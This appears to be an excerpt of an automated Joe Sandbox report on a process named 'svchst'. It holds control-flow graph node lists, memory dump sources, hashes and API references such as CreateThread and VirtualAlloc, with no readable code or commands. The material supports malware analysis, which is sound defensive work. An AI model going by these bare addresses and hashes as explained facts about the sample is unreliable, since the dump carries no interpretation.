2534b43-2534b4f 90->98 99 2534b55-2534d25 90->99 101 25352bf-25352ce 91->101 92->93 96 2534a63 93->96 97 2534a68-2534a70 93->97 94->95 95->90 96->97 97->82 98->99 109 2534d27-2534d2b 99->109 110 2534d89-2534d9e 99->110 102 2535261-2535289 101->102 103 25352d0-2535358 101->103 106 2535290-25352b9 102->106 107 253528b 102->107 138 25354d1-25354dd 103->138 106->101 107->106 109->110 116 2534d2d-2534d3c 109->116 114 2534da0 110->114 115 2534da5-2534dc6 110->115 112 2534f01-2534f07 111->112 113 2534eac-2534ef6 111->113 112->51 113->111 114->115 118 2534dc8 115->118 119 2534dcd-2534dec 115->119 121 2534d7b-2534d81 116->121 118->119 125 2534df3-2534e13 119->125 126 2534dee 119->126 122 2534d83-2534d84 121->122 123 2534d3e-2534d42 121->123 128 2534e1e 122->128 130 2534d44-2534d48 123->130 131 2534d4c-2534d6d 123->131 132 2534e15 125->132 133 2534e1a 125->133 126->125 128->64 130->131 134 2534d74-2534d78 131->134 135 2534d6f 131->135 132->133 133->128 134->121 135->134 140 25354e3-253553e 138->140 141 253535d-2535366 138->141 156 2535540-2535573 140->156 157 2535575-253559f 140->157 142 2535368 141->142 143 253536f-25354c5 141->143 142->143 145 2535375-25353b5 142->145 146 2535444-2535484 142->146 147 25353ba-25353fa 142->147 148 25353ff-253543f 142->148 160 25354cb 143->160 145->160 146->160 147->160 148->160 165 25355a8-2535662 156->165 157->165 160->138 165->55
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$Teq$pq$xbq
                      • API String ID: 0-2466396065
                      • Opcode ID: 4b9906cd7db68d9ebebbc69f71ffc59a9779eed5310498a6ee4a0e379f7b2e12
                      • Instruction ID: e809876957519e230fd6ab9b172768209984bf6c70dfc34859dc20725ad1ccec
                      • Opcode Fuzzy Hash: 4b9906cd7db68d9ebebbc69f71ffc59a9779eed5310498a6ee4a0e379f7b2e12
                      • Instruction Fuzzy Hash: 4DA2B375A00228CFDB65CF69C984B99BBB2FF89304F1581E9D509AB365DB319E81CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 171 2538b70-2538b9e 172 2538ba0 171->172 173 2538ba5-2538cc4 171->173 172->173 176 2538cd3-2538cdf 173->176 177 2538cc6-2538ccd call 253b2c2 173->177 178 2538ce1 176->178 179 2538ce6-2538ceb 176->179 177->176 178->179 180 2538d23-2538d6c 179->180 181 2538ced-2538cf9 179->181 189 2538d73-2538f8c 180->189 190 2538d6e 180->190 182 2538d00-2538d1e 181->182 183 2538cfb 181->183 185 253a1d0-253a1d6 182->185 183->182 186 253a201 185->186 187 253a1d8-253a1f8 185->187 192 253a202 186->192 187->186 213 25399bc-25399c8 189->213 190->189 192->192 214 2538f91-2538f9d 213->214 215 25399ce-2539a06 213->215 216 2538fa4-25390c9 214->216 217 2538f9f 214->217 223 2539ab5-2539abb 215->223 250 25390cb-2539103 216->250 251 2539109-2539192 216->251 217->216 225 2539ac1-2539af9 223->225 226 2539a0b-2539a36 223->226 236 2539cf8-2539cfe 225->236 235 2539a42-2539a5d 226->235 237 2539a90-2539ab2 235->237 238 2539a5f-2539a63 235->238 240 2539d04-2539d4c 236->240 241 2539afe-2539c29 236->241 237->223 238->237 242 2539a65-2539a8d 238->242 248 2539dc7-2539e12 240->248 249 2539d4e-2539dc1 240->249 289 2539c96-2539c9a 241->289 290 2539c2b-2539c94 241->290 242->237 271 253a19a-253a1a0 248->271 249->248 250->251 277 25391a1-2539225 251->277 278 2539194-253919c 251->278 273 2539e17-2539e99 271->273 274 253a1a6-253a1ce 271->274 293 2539ec1-2539ecd 273->293 294 2539e9b-2539eb6 273->294 274->185 312 2539227-253922f 277->312 313 2539234-25392b8 277->313 281 25399ad-25399b9 278->281 281->213 295 2539ccc-2539cde 289->295 296 2539c9c-2539cca 289->296 308 2539cdf-2539cf5 290->308 298 2539ed4-2539ee0 293->298 299 2539ecf 293->299 294->293 295->308 296->308 303 2539ef3-2539f02 298->303 304 2539ee2-2539eee 298->304 299->298 306 2539f04 303->306 307 2539f0b-253a162 303->307 310 253a181-253a197 304->310 306->307 314 2539f11-2539f4f 306->314 315 2539fd1-253a03a 306->315 316 2539f54-2539fcc 306->316 317 253a03f-253a0a8 306->317 318 253a0ad-253a0ea 306->318 340 253a16d-253a179 307->340 308->236 310->271 312->281 352 25392c7-253934b 313->352 353 25392ba-25392c2 313->353 314->340 315->340 316->340 317->340 339 253a133-253a139 318->339 343 253a13b-253a145 339->343 344 253a0ec-253a11f 339->344 340->310 343->340 349 253a121 344->349 350 253a126-253a130 344->350 349->350 350->339 359 253935a-25393de 352->359 360 253934d-2539355 352->360 353->281 366 25393e0-25393e8 359->366 367 25393ed-2539471 359->367 360->281 366->281 373 2539473-253947b 367->373 374 2539480-2539504 367->374 373->281 380 2539513-2539597 374->380 381 2539506-253950e 374->381 387 25395a6-253962a 380->387 388 2539599-25395a1 380->388 381->281 394 2539639-25396bd 387->394 395 253962c-2539634 387->395 388->281 401 25396bf-25396c7 394->401 402 25396cc-2539750 394->402 395->281 401->281 408 2539752-253975a 402->408 409 253975f-25397e3 402->409 408->281 415 25397f2-2539876 409->415 416 25397e5-25397ed 409->416 422 2539885-2539909 415->422 423 2539878-2539880 415->423 416->281 429 253990b-2539913 422->429 430 2539918-253999c 422->430 423->281 429->281 436 25399a8-25399aa 430->436 437 253999e-25399a6 430->437 436->281 437->281
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2$$q
                      • API String ID: 0-2017333547
                      • Opcode ID: 9774451e0d2278c619026f56b9f513133c2306dfca7094962ed3d4fe848354d6
                      • Instruction ID: a75564daaff1105da83b9d81583be49623401c033e92de1cb8feedd9e59edb4c
                      • Opcode Fuzzy Hash: 9774451e0d2278c619026f56b9f513133c2306dfca7094962ed3d4fe848354d6
                      • Instruction Fuzzy Hash: 29D206B4A012288FDB65DF69D884B9EBBF2FB89300F1081E9D509A7355DB349E81CF54
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 19d8100238207c950ad4244a76e3878e88b04e291e3a795a95d645a6a9cac570
                      • Instruction ID: 257e58758d68efc6d145f3815ae1ab1926e15991a71f5e8c784512b539a9a8d2
                      • Opcode Fuzzy Hash: 19d8100238207c950ad4244a76e3878e88b04e291e3a795a95d645a6a9cac570
                      • Instruction Fuzzy Hash: D342C1B8A442298FDB65DF28C884B99B7B6FB88301F1081E9D54DA7355DB30AE81CF54
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a646e2dd71a87af837314bc212fad7031f175450bcb120493d8869a09281832f
                      • Instruction ID: cbecb9e289d4585980916b707fd783b2c757c661da315d869413efadceedf7c1
                      • Opcode Fuzzy Hash: a646e2dd71a87af837314bc212fad7031f175450bcb120493d8869a09281832f
                      • Instruction Fuzzy Hash: C5C102B4D06218CFDB25CFA9C944BD9BBF2BB49310F00A499941DAB214D7748AC8CF44
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 381371e6b8d5b90c845647fdfa1ba8b534ab88aadde7d605d90bb271eef645fd
                      • Instruction ID: 2b286c58f9221dff7350e782668e2bdef6533c7450a7365c71e9c05b329a6199
                      • Opcode Fuzzy Hash: 381371e6b8d5b90c845647fdfa1ba8b534ab88aadde7d605d90bb271eef645fd
                      • Instruction Fuzzy Hash: CE51B6B1E056188BEB18CF6BD94478AFBF3BFC8304F14C1AAD548AA265DB344981CF54
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1571004858.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_4f20000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 470ec77c39f6430341aabd61fb8f40d5a7e12db11afe5c7fdadebb888893ecd1
                      • Instruction ID: baed9aea809551079c96c23790ebdc007f71d59b6bdf7dc64e0fcdd4a9590ec1
                      • Opcode Fuzzy Hash: 470ec77c39f6430341aabd61fb8f40d5a7e12db11afe5c7fdadebb888893ecd1
                      • Instruction Fuzzy Hash: 4721B7B1E056089BEB18CFABC95479EBBF6BF88301F14C07AC419AB265EB745546CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 533 4f271d0-4f271d7 534 4f2e417-4f2e452 533->534 535 4f271dd-4f271de 533->535 540 4f2e45a-4f2e461 534->540 535->534
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1571004858.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_4f20000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0$Y
                      • API String ID: 0-947205236
                      • Opcode ID: 252d2f2ef04b272c00dfe8fd3186cc7a535bf8d0d4d3f82ae9a10f3ca68d1345
                      • Instruction ID: f9b735bcf4da8bf44839e7725f180fdd3dd193a32c96e8f2c2ac551f7ccbab46
                      • Opcode Fuzzy Hash: 252d2f2ef04b272c00dfe8fd3186cc7a535bf8d0d4d3f82ae9a10f3ca68d1345
                      • Instruction Fuzzy Hash: 6BF01C38D55228CFDB28DF24D8A8BA97775BF85348F400098D10A272A0DF345E85EF04

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 541 4f20506-4f2050c 542 4f20517-4f2053f 541->542 544 4f20545-4f20550 542->544 545 4f200fc-4f20107 542->545 544->545 546 4f20110-4f20389 545->546 547 4f20109-4f224f9 545->547 546->545 555 4f2038f-4f2039a 546->555 547->545 552 4f224ff-4f2250a 547->552 552->545 555->545
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1571004858.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_4f20000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: X$h
                      • API String ID: 0-795848406
                      • Opcode ID: edbf374aba2493f8b008abb368eba01d9613d898cc9759dc20c3f749e1868f73
                      • Instruction ID: 247ee5b0dde0b68934f9de611a1416bfbf25ca4f6ffec74a843d839cd87135bd
                      • Opcode Fuzzy Hash: edbf374aba2493f8b008abb368eba01d9613d898cc9759dc20c3f749e1868f73
                      • Instruction Fuzzy Hash: 2FF03939850229CFEB24DF14C958B9AB7B2FB04309F0044E5C60863280EB345E84DF01

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 556 270403a-270410d CreateThread 558 2704116-270414e 556->558 559 270410f-2704115 556->559 559->558
                      APIs
                      • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 027040FD
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566956197.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2700000_svchst.jbxd
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 99136614e81edac40946ad206bdfa404946e88f9db8c8bf3e2e9fb63d7dab49d
                      • Instruction ID: 5f75cb25046c1d2c1bcd8b701d04896f318703bcb290eea187d31982aa252dfd
                      • Opcode Fuzzy Hash: 99136614e81edac40946ad206bdfa404946e88f9db8c8bf3e2e9fb63d7dab49d
                      • Instruction Fuzzy Hash: BB4168B9D042589FCF10CFA9D984A9EFBF1BB19310F24A02AE918B7350D375A946CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 562 2704040-270410d CreateThread 564 2704116-270414e 562->564 565 270410f-2704115 562->565 565->564
                      APIs
                      • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 027040FD
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566956197.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2700000_svchst.jbxd
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 2da234e8c16453089339b28d86b7bed4977356f6c9cb7d15a028d8ef8ae3379d
                      • Instruction ID: ea6ab486d24efe69a9aa785d67c4a28849a00c69f942611a4e8aaa42e4eadede
                      • Opcode Fuzzy Hash: 2da234e8c16453089339b28d86b7bed4977356f6c9cb7d15a028d8ef8ae3379d
                      • Instruction Fuzzy Hash: 334177B9D042589FCF10CFA9D980A9EFBF1BB09310F20A02AE918B7350D375A945CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 568 253da60-253daad 571 253dab3-253dabb 568->571 572 253da0f-253da15 568->572 571->572 573 253da17 572->573 574 253da1e-253e2bf 572->574 576 253d832-253d844 573->576 577 253d7b2-253d7d0 573->577 578 253d896-253d89d 573->578 579 253dbf4-253dc5c call 253d590 573->579 580 253d743-253d74d 573->580 581 253d901-253d908 573->581 582 253d860-253d883 call 253d590 573->582 583 253d700-253d701 573->583 584 253d740-253d741 573->584 585 253d6e7-253d6fb 573->585 586 253d706-253d725 573->586 587 253d965-253d996 call 253d590 573->587 588 253d8e4-253d8ee 573->588 589 253d78b-253d792 573->589 590 253d72a-253d73b 573->590 591 253d949-253d960 573->591 592 253d849-253d85b 573->592 593 253d9a9-253d9b0 573->593 594 253d909-253d938 call 253d590 573->594 595 253d7e9-253d7f3 573->595 596 253d66e-253d6c2 573->596 597 253d6ce-253d6e2 573->597 574->572 598 253d65c-253d662 576->598 620 253d7dc-253d7e4 577->620 579->572 644 253dc62-253dc6a 579->644 603 253d753-253d778 call 253d590 580->603 604 253d89e-253d8a8 580->604 582->598 622 253d889-253d891 582->622 583->595 584->580 585->598 586->598 587->598 624 253d99c-253d9a4 587->624 588->582 600 253d8f4-253d8fc 588->600 590->598 591->598 592->598 645 253d9b6 call 4f22303 593->645 646 253d9b6 call 4f271d0 593->646 647 253d9b6 call 4f26240 593->647 648 253d9b6 call 4f24511 593->648 649 253d9b6 call 4f20506 593->649 650 253d9b6 call 4f265c9 593->650 651 253d9b6 call 4f2081e 593->651 652 253d9b6 call 4f25c4c 593->652 653 253d9b6 call 4f2186d 593->653 654 253d9b6 call 4f276ad 593->654 594->598 623 253d93e-253d944 594->623 595->591 605 253d7f9-253d81f 595->605 596->598 636 253d6c4-253d6cc 596->636 597->598 609 253d664 598->609 610 253d66b-253d66c 598->610 600->598 603->598 631 253d77e-253d786 603->631 606 253d793-253d7ad 604->606 607 253d8ae-253d8d3 call 253d590 604->607 605->598 634 253d825-253d82d 605->634 606->577 606->598 607->598 635 253d8d9-253d8df 607->635 609->576 609->577 609->578 609->580 609->581 609->582 609->583 609->584 609->585 609->586 609->587 609->588 609->589 609->590 609->591 609->592 609->593 609->594 609->595 609->596 609->597 610->585 610->596 619 253d9bc-253d9d3 call 253d590 637 253d9d5-253d9db 619->637 638 253d9dd-253d9e2 619->638 620->598 622->598 623->598 624->598 631->598 634->598 635->588 635->598 636->598 637->638 640 253d9e7-253d9e8 638->640 641 253d9e4-253d9e5 638->641 641->640 644->572 645->619 646->619 647->619 648->619 649->619 650->619 651->619 652->619 653->619 654->619
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: !
                      • API String ID: 0-2657877971
                      • Opcode ID: 54e33aa6a6956c8858aa068294fecd3b6372812d0c9bac55bdeac1ef67a0fb44
                      • Instruction ID: 306a3fc49e775fcb2be3b882ef1f6a3bbed335a7592fdb654592bea2535cdfd6
                      • Opcode Fuzzy Hash: 54e33aa6a6956c8858aa068294fecd3b6372812d0c9bac55bdeac1ef67a0fb44
                      • Instruction Fuzzy Hash: 5AA1DFB4906268CFCB61CFA8C984BDCBBF1BB49324F10A495D45DAB254C7749AD8CF48

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 704 253b2c2-253b2ea 705 253b2f1-253b308 704->705 706 253b2ec 704->706 708 253b30b-253b311 705->708 706->705 709 253b313 708->709 710 253b31a-253b31b 708->710 709->710 711 253b330-253b336 709->711 712 253b337-253b338 709->712 713 253b4ea 709->713 714 253b33a-253b4d7 call 2537780 709->714 715 253b31d-253b324 709->715 710->711 712->711 717 253b4f3-253b50b 713->717 714->708 743 253b4dd-253b4e5 714->743 715->714 716 253b326-253b32e 715->716 716->708 717->708 721 253b511-253b517 717->721 721->708 743->708
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq
                      • API String ID: 0-48878262
                      • Opcode ID: 5298b2c120d2657bce3fb0e4151a3db11599912bc6790534b087b481f63059d8
                      • Instruction ID: f67a86c51a81dbe3b1b26e43a2ef50faf4b3ee56342a0f47f55c973c6306937f
                      • Opcode Fuzzy Hash: 5298b2c120d2657bce3fb0e4151a3db11599912bc6790534b087b481f63059d8
                      • Instruction Fuzzy Hash: 8A611278E153189FDB04DFA9E494A9EBBF2FF89304F109029E406A7368DB385946CF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 655 25319ea 656 25319f6-2531a25 655->656 657 2531a27-2531a3d 656->657 658 2531a3f-2531a4b 656->658 659 2531a55-2531a69 657->659 658->659 698 2531a6f call 2536148 659->698 699 2531a6f call 2536138 659->699 660 2531a75-2531aa0 662 2531aa2 660->662 663 2531aa7-2531ab5 660->663 662->663 664 2531ab7 663->664 665 2531abc-2531aca 663->665 664->665 666 2531ad1-2531adf 665->666 667 2531acc 665->667 668 2531ae1 666->668 669 2531ae6-2531b2e 666->669 667->666 668->669 672 2531b30 669->672 673 2531b35-2531b43 669->673 672->673 674 2531b45 673->674 675 2531b4a-2531b58 673->675 674->675 676 2531b5a 675->676 677 2531b5f-2531b6d 675->677 676->677 678 2531b74-2531b82 677->678 679 2531b6f 677->679 680 2531b84 678->680 681 2531b89-2531b97 678->681 679->678 680->681 682 2531b99 681->682 683 2531b9e-2531bac 681->683 682->683 684 2531bb3-2531bc1 683->684 685 2531bae 683->685 686 2531bc3 684->686 687 2531bc8-2531be5 684->687 685->684 686->687 689 2531bf1-2531c17 687->689 700 2531c1d call 2536148 689->700 701 2531c1d call 2536138 689->701 690 2531c23 691 2531c2f-2531c44 690->691 702 2531c4a call 2536148 691->702 703 2531c4a call 2536138 691->703 692 2531c50-2531ca9 695 25319c6-25319db 692->695 696 2531caf-2531cb0 692->696 695->655 698->660 699->660 700->690 701->690 702->692 703->692
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      • Opcode ID: 475ffe689ed743a12f53cf4e6bad50855d17d60484caad746d984186cf41c8b4
                      • Instruction ID: fbf3047b814e1c342c31e34ed11c46aba22f27feb8355c66c70581af954ed61c
                      • Opcode Fuzzy Hash: 475ffe689ed743a12f53cf4e6bad50855d17d60484caad746d984186cf41c8b4
                      • Instruction Fuzzy Hash: A681C774905668CFEB61CB68C998B8DBBB1BF49301F1581D9D04DA72A1CB309E84CF69

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 744 2534460-2534461 745 2534463-2534469 744->745 746 25344b7-25344bb 744->746 747 253446b-253447a 745->747 748 25344bf-25344c1 745->748 749 25344c2-25344d4 746->749 750 25344bd 746->750 753 2534481 747->753 754 253447c 747->754 748->749 751 25344f6-2534516 748->751 755 25344d7-25344dd 749->755 750->748 767 253451e-2534525 751->767 790 2534482 call 25346f0 753->790 791 2534482 call 2534460 753->791 792 2534482 call 2534490 753->792 793 2534482 call 25344a0 753->793 754->753 758 25344e6-25344e7 755->758 759 25344df 755->759 756 2534488-253448a 760 253458b-25345a5 758->760 761 25344ec 758->761 759->760 759->761 762 2534643-253465d 759->762 763 2534526-2534527 759->763 764 253455b-253457a 759->764 765 2534529-2534530 759->765 788 25345a8 call 2535820 760->788 789 25345a8 call 253580f 760->789 761->751 786 2534660 call 2535d61 762->786 787 2534660 call 2535d70 762->787 763->767 764->755 772 2534580-2534586 764->772 765->767 768 2534532-253454c 765->768 768->755 776 253454e-2534556 768->776 772->755 774 2534666-2534693 774->761 782 2534699-25346a1 774->782 775 25345ae-2534630 775->755 785 2534636-253463e 775->785 776->755 782->755 785->755 786->774 787->774 788->775 789->775 790->756 791->756 792->756 793->756
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: t^Fsm
                      • API String ID: 0-2728660769
                      • Opcode ID: 2c2df6447519182f702c83b9ca07300834fc90b6040271c05c424ee77b635771
                      • Instruction ID: 636e1a5a19092abaed2b5d524ad66094571a4a97ee11b01ca8f63fb196ffa0ad
                      • Opcode Fuzzy Hash: 2c2df6447519182f702c83b9ca07300834fc90b6040271c05c424ee77b635771
                      • Instruction Fuzzy Hash: 595156B4D043498FCB11DFE8D895AEEBBB1FF8A314F109029D205AB254DB345986CF85

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 794 2534490-2534499 795 253449b-25344bb 794->795 796 25344ef 794->796 797 25344c2-25344d4 795->797 798 25344bd-25344c1 795->798 799 25344f6-2534516 796->799 803 25344d7-25344dd 797->803 798->797 798->799 813 253451e-2534525 799->813 804 25344e6-25344e7 803->804 805 25344df 803->805 807 253458b-25345a5 804->807 808 25344ec 804->808 805->807 805->808 809 2534643-253465d 805->809 810 2534526-2534527 805->810 811 253455b-253457a 805->811 812 2534529-2534530 805->812 832 25345a8 call 2535820 807->832 833 25345a8 call 253580f 807->833 808->799 834 2534660 call 2535d61 809->834 835 2534660 call 2535d70 809->835 810->813 811->803 818 2534580-2534586 811->818 812->813 814 2534532-253454c 812->814 814->803 822 253454e-2534556 814->822 818->803 820 2534666-2534693 820->808 828 2534699-25346a1 820->828 821 25345ae-2534630 821->803 831 2534636-253463e 821->831 822->803 828->803 831->803 832->821 833->821 834->820 835->820
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: t^Fsm
                      • API String ID: 0-2728660769
                      • Opcode ID: 19737bd15a8a596b2f05c004de15f98c282886f17e5a77f82417625f73ca5dd8
                      • Instruction ID: cae4dd29532d76ccd5b474d2bc2c1f95f9da50c1c15838113e24dca1c02bddcb
                      • Opcode Fuzzy Hash: 19737bd15a8a596b2f05c004de15f98c282886f17e5a77f82417625f73ca5dd8
                      • Instruction Fuzzy Hash: 64513674D0434D8FDB01DFA8D895BAEBBB1FF8A304F109029D605AB254EB745986CF85

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 836 25346f0-25346fd 837 2534693 836->837 838 25346ff-2534710 836->838 839 2534699-25346a1 837->839 840 25344ec-2534516 837->840 841 2534712 838->841 842 2534717-2534727 838->842 843 25344d7-25344dd 839->843 855 253451e-2534525 840->855 841->842 848 253472f-2534733 842->848 846 25344e6-25344e7 843->846 847 25344df 843->847 846->840 849 253458b-25345a5 846->849 847->840 847->849 850 2534643-253465d 847->850 851 2534526-2534527 847->851 852 253455b-253457a 847->852 853 2534529-2534530 847->853 875 25345a8 call 2535820 849->875 876 25345a8 call 253580f 849->876 873 2534660 call 2535d61 850->873 874 2534660 call 2535d70 850->874 851->855 852->843 860 2534580-2534586 852->860 853->855 856 2534532-253454c 853->856 856->843 865 253454e-2534556 856->865 860->843 863 2534666-253468f 863->837 864 25345ae-2534630 864->843 872 2534636-253463e 864->872 865->843 872->843 873->863 874->863 875->864 876->864
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: t^Fsm
                      • API String ID: 0-2728660769
                      • Opcode ID: 95cb91acf973816c8d828fda2608d3960da33abf248820822b2527a1abf6d4a2
                      • Instruction ID: 79edda5cb96e4252faa611b0dd7c545a74cad328dac3d2455fbfe60b54c3f935
                      • Opcode Fuzzy Hash: 95cb91acf973816c8d828fda2608d3960da33abf248820822b2527a1abf6d4a2
                      • Instruction Fuzzy Hash: 615125B4D04249CFDB01DFA4D855BAEBBB1FF8A304F109029D205AB254EB345986CB85

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 877 25344a0-25344bb 878 25344c2-25344d4 877->878 879 25344bd-25344c1 877->879 882 25344d7-25344dd 878->882 879->878 883 25344f6-2534516 879->883 884 25344e6-25344e7 882->884 885 25344df 882->885 893 253451e-2534525 883->893 886 253458b-25345a5 884->886 887 25344ec 884->887 885->886 885->887 888 2534643-253465d 885->888 889 2534526-2534527 885->889 890 253455b-253457a 885->890 891 2534529-2534530 885->891 915 25345a8 call 2535820 886->915 916 25345a8 call 253580f 886->916 887->883 913 2534660 call 2535d61 888->913 914 2534660 call 2535d70 888->914 889->893 890->882 898 2534580-2534586 890->898 891->893 894 2534532-253454c 891->894 894->882 903 253454e-2534556 894->903 898->882 901 2534666-2534693 901->887 909 2534699-25346a1 901->909 902 25345ae-2534630 902->882 912 2534636-253463e 902->912 903->882 909->882 912->882 913->901 914->901 915->902 916->902
                      Strings
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: t^Fsm
                      • API String ID: 0-2728660769
                      • Opcode ID: bd004cac4787c5b32ce454158db1e195242b87916523c787a6f294f5e7dfe2d6
                      • Instruction ID: 70dc9a65d291b16066f7349facf6d0c0878d02cfce18e0d800dacbf00fcc7017
                      • Opcode Fuzzy Hash: bd004cac4787c5b32ce454158db1e195242b87916523c787a6f294f5e7dfe2d6
                      • Instruction Fuzzy Hash: ED511574D1420D8FDB00DFA8D855BAEBBB1FF8A314F109029D609AB254EB745985CF85
                      APIs
                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02703EBA
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566956197.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2700000_svchst.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 41bd203865e083bd91b7cb3f4628033956d9af49638b07d34fcfdb2b3bd9ce6a
                      • Instruction ID: 5a61231b0fcf5ff51c63ea2f3de981316152dcc37344a8b751d4c473a7a51fe3
                      • Opcode Fuzzy Hash: 41bd203865e083bd91b7cb3f4628033956d9af49638b07d34fcfdb2b3bd9ce6a
                      • Instruction Fuzzy Hash: 313177B8D04258DFCB10CFA9E980A9EFBF1AB49310F24906AE818B7350D335A945CF64
                      APIs
                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02703EBA
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566956197.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2700000_svchst.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
